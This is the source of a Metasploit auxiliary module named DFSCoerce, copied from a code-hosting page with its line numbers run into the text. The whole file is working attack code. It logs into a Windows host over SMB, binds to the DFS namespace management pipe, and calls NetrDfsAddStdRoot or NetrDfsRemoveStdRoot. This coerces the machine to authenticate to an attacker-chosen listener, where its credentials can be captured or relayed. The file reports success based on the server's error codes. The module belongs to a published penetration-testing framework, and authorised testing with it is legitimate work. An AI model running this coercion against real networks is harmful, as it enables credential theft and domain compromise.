Path: blob/master/modules/auxiliary/scanner/dcerpc/dfscoerce.rb
19567 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'windows_error'6require 'ruby_smb'7require 'ruby_smb/error'89class MetasploitModule < Msf::Auxiliary10include Msf::Exploit::Remote::DCERPC11include Msf::Exploit::Remote::SMB::Client::Authenticated12include Msf::Auxiliary::Scanner1314Dfsnm = RubySMB::Dcerpc::Dfsnm1516METHODS = %w[NetrDfsAddStdRoot NetrDfsRemoveStdRoot].freeze1718def initialize19super(20'Name' => 'DFSCoerce',21'Description' => %q{22Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.23},24'Author' => [25'Wh04m1001',26'xct_de',27'Spencer McIntyre'28],29'References' => [30[ 'URL', 'https://github.com/Wh04m1001/DFSCoerce' ]31],32'License' => MSF_LICENSE,33'Notes' => {34'Stability' => [CRASH_SAFE],35'SideEffects' => [IOC_IN_LOGS],36'Reliability' => []37}38)3940register_options(41[42OptString.new('LISTENER', [ true, 'The host listening for the incoming connection', Rex::Socket.source_address ]),43OptEnum.new('METHOD', [ true, 'The RPC method to use for triggering', 'Automatic', ['Automatic'] + METHODS ])44]45)46end4748def connect_dfsnm49vprint_status('Connecting to Distributed File System (DFS) Namespace Management Protocol')50netdfs = @tree.open_file(filename: 'netdfs', write: true, read: true)5152vprint_status('Binding to \\netdfs...')53netdfs.bind(endpoint: RubySMB::Dcerpc::Dfsnm)54vprint_good('Bound to \\netdfs')5556netdfs57end5859def run_host(_ip)60begin61connect62rescue Rex::ConnectionError => e63fail_with(Failure::Unreachable, e.message)64end6566begin67smb_login68rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e69fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")70end7172begin73@tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")74rescue RubySMB::Error::RubySMBError => e75fail_with(Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")76end7778begin79dfsnm = connect_dfsnm80rescue RubySMB::Error::UnexpectedStatusCode => e81if e.status_code == ::WindowsError::NTStatus::STATUS_ACCESS_DENIED82fail_with(Failure::NoAccess, 'Connection failed (STATUS_ACCESS_DENIED)')83end8485fail_with(Failure::UnexpectedReply, "Connection failed (#{e.status_code.name})")86rescue RubySMB::Dcerpc::Error::FaultError => e87elog(e.message, error: e)88fail_with(Failure::UnexpectedReply, "Connection failed (DCERPC fault: #{e.status_name})")89end9091begin92case datastore['METHOD']93when 'NetrDfsAddStdRoot'94dfsnm.netr_dfs_add_std_root(datastore['LISTENER'], 'share', comment: Faker::Hacker.say_something_smart)95when 'NetrDfsRemoveStdRoot', 'Automatic'96# use this technique by default, it's the original and doesn't require a comment97dfsnm.netr_dfs_remove_std_root(datastore['LISTENER'], 'share')98end99rescue RubySMB::Dcerpc::Error::DfsnmError => e100case e.status_code101when ::WindowsError::Win32::ERROR_ACCESS_DENIED102# this should be the response even if LISTENER captured the credentials (MSF, Responder, etc.)103print_good('Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful')104when ::WindowsError::Win32::ERROR_BAD_NETPATH105# this should be the response even if LISTENER was inaccessible106print_good('Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful')107else108print_status("Server responded with #{e.status_code.name} (#{e.status_code.description})")109end110end111end112end113114115